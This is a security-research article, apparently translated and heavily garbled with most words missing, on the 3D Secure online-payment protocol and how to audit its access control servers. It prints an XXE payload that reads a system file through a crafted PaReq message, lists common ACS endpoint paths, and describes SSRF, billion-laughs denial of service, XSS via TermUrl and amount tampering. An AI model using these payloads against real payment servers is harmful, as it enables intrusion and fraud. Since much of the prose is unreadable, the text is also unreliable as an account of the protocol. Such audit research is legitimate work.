E-commerce is one of the largest and fastest growing areas and therefore attracts the attention of both information security researchers and cybercriminals. Therefore, I would like to understand some aspects of the security mechanisms used in online payments.
, - β 3D Secure. , XML , (card not present payment). VISA , (Master Card, JCB International, AmEx, ), VISA EMV. EMV 3DS.
3D Secure ?
β Three Domain Secure.
β β , .
β β , .
β (interoperability domain) β , (, , ) 3D Secure. , (merchant plug-in), (access control server) .
?
3D Secure .
Β« Β». , -. (), .. 3D Secure .
: - .
3DS, .
3D Secure
v1.0 - 2001 -β¦
v2.0 - 2014 -
v2.1 - 2017
v2.2 - 2018 1.0.2 CNP-, OTP-.
1.0.2 2001 .
v2.2, EMV , 2020- .
?
, 3DS.
, , .
?
, , β , ( ) -, 3DS. -.
1 β "". MPI-, .
(MPI) , , CRReq- (Card Range Request). , - CRR . .
MPI VeReq (Verification Request). - , 3DS .
VeRes (Verification Response) .
.
2 β MPI PaReq (Payment Request) β . .
PaReq OTP-.
3 β OTP- . - MPI PaRes (Payment Response), .
?
CRReq/CRRes . VeReq/VeRes .
<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
<Message id="999">
<VEReq>
<version>1.0.2</version>
<pan>4444333322221111</pan>
<Merchant>
<acqBIN>411111</acqBIN>
<merID>99000001</merID>
<password>99000001</password>
</Merchant>
<Browser>
<deviceCategory>0</deviceCategory>
<accept>*/*</accept>
<userAgent>curl/7.27.0</userAgent>
</Browser>
</VEReq>
</Message>
</ThreeDSecure>VeReq , PAN .
<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
<Message id="999">
<VERes>
<version>1.0.2</version>
<CH>
<enrolled>Y</enrolled>
<acctID>A0fTY+pKUTu/6hcZWZJiAA==</acctID>
</CH>
<url>https://dropit.3dsecure.net:9443/PIT/ACS</url>
<protocol>ThreeDSecure</protocol>
</VERes>
</Message>
</ThreeDSecure>VeRes message id, , . status enrolled , .
URL-. , ACS PaReq.
Pareq
, , , . , , . , . PaReq.
URL: https://site.ru/acs/pareq
MD=5ebde4d3-3796-7a4d-5ebd-e4d300003dd0&PaReq=eJxVUstywjAM%2FBUm98QPDDiMcIc2dMoh0AedKb2ljiDpNAFMUgJfXzuFPnzSrjQraWW4aoqPzieafb4pRx4LqNfBUm%2FSvFyPvOfFrS%2B9KwWLzCBGT6hrgwpi3O%2BTNXbydOS96VDocEX9FePaF1IIPwlF6qeoV7Inqeyh9hTcjx9xp%2BDcSNk%2BAQdygVbR6CwpKwWJ3l1PZ0rwQZ9SIGcIBZpppAaSuse7POwC%2BeagTApUy%2FEsmrwE8Xw2WQJpKdCbuqzMUfWFLb4AqM2HyqpqOyTkcDgExabEY3BMyhSbwNRAXB7I70D3tYv2Vq%2FJUzU7Teg8ejjE7xMWn9Z8Hk35fKEtNx4BcRWQJhUqTplklIoOC4c9NuwOgLQ8JIUbRDHK2vW%2BEWxdk%2FG%2F1F8KrO%2FGnuWyywUBNls7v62wZv7EQH5nvrlzlurKGsUGNOwy0ZfhXf5udlkmV7ey98rfmnjpjG6LnGJubeKUslbSASBOhpxvSM7nt9G%2Fb%2FEFnkK9RA%3D%3D&TermUrl=https%3A%2F%shop.ru%2Fgates%2F3ds , PaReq ( POST), :
1) MD β . MPI, PaReq PaRes ;
2) PaReq β . ;
3) TermUrl β URL-, 3D Secure.
TermURL MD . ACS, reflected XSS. .
β1: ACS PaReq!
PaReq?
, PaReq. , PaReq β Xml-> zlib-> base64-> urlencode. burp.
, PaReq, xml. (purchAmount, amount currency), MessageId ( VeReq).
PaReq ( β PaReq, ), PaRes β , :
, -, XML- β XXE. !
, , PaReq. ! :
<ThreeDSecure><Message id="poEpShmja0A36YWe0JOyr4Zt"><Error><version>1.0.2</version><errorCode>99</errorCode><errorMessage>Permanent system failure.</errorMessage><errorDetail>Failed to build error message.</errorDetail></Error></Message></ThreeDSecure>
<errorCode>5</errorCode><errorMessage>Format of one or more elements is invalid according to the specification.</errorMessage>
<errorCode>98</errorCode><errorMessage>Transient system failure</errorMessage>
<errorCode>4</errorCode><errorMessage>Critical element not recognized</errorMessage>ACS. XXE.
XXE
:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM "file:///proc/sys/kernel/hostname">]><ThreeDSecure><Message id=β123-123-123-123-123-123"><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>∾</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>acqBIN, merID, xid, date, purchAmount currency PaRes. ACS, , merID. .
( ) β URL. , . XXE.
. ACS , , PaRes error merID. , PaReq , :
<ThreeDSecure><Message id=" 123-123-123-123-123-123 "><PARes id=" 123-123-123-123-123-123 "><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN>
<merID>ACS server name</merID>
</Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>URL DNS HTTP- . β DOS XXE- "billion laughs" ( ).
?
URL-:
/acs/pareq/___uid___
/acspage/cap?RID=14&VAA=B
/way4acs/pa?id=____id____
/PaReqVISA.jsp
/PaReqMC.jsp
/mdpayacs/pareq
/acs/auth/start.do:
acs
3ds
3ds
secure
cap
payments
ecm
3dsauth
testacs
card, .
- , proxy interceptor .
3D Secure v 2. *
, 3DS v1.0 .
, . , , , .. ACS .
3DS 2.0 3DS SDK.
, . . , , , .
, . , 3DS OTP. v2 .
v1.0. , , !
.
3D Secure v2?
. .
β Risk Engine. 1.0.2 , OTP. 2. * .
v2
, , , 2- . Risck Engine, ( ), ( 3DS SDK).
, 2- . , , , .
?
AReq (base64url) , .
, , AReq . , , : . , )
.
, Risk Engine , OTP-.
?
CReq (base64url json) β challenge request β , , ARes Challenge Flow.
{
"ThreeDSServerTransID": "8a880dc0-d2d2-4067-bcb1-b08d1690b26e",
"AcsTransID": "d7c1ee99-9478-44a6-b1f2-391e29c6b340",
"MessageType": "CReq",
"MessageVersion": "2.1.0",
"SdkTransID": "b2385523-a66c-4907-ac3c-91848e8c0067",
"SdkCounterStoA": "001"
}
3D Secure SDK, (JWE).
CReq :
, 2- 3DS, , . , .
( )
v1
- XXE Pareq:
- DOS
- ssrf
- XSS TermUrl
- Blind XSS β
- Pareq , ! , .. , 100 1.
v2
- Blind XSS β
- Challenge flow, β¦
, , , 3DS SaaS. , , -.
https://github.com/w3c/webpayments/wiki
https://www.EMV.com/emv-technologies/3d-secure/
https://3dsserver.netcetera.com/3dsserver-saas/doc/current/schema/3ds-api.html
https://github.com/webr0ck/3D-Secure-audit-cheatsheet
P.S. , : " AliExpress, Amazon, , OTP . 3DS?" , . , .